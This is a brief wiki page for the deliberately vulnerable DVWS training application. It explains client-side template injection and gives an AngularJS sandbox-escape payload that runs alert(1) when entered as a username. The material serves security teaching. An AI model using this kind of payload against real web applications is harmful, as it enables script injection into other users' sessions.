Client Side Template Injection (CSTI) - snoopysecurity/dvws-node GitHub Wiki
Introduction
Client-side template injection vulnerabilities arise when applications using a client-side template framework dynamically embed user input in web pages.
Details
The welcome page of the DVWS application is vulnerable to CSTI. This can be exploited by creating a user with the following payload.
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
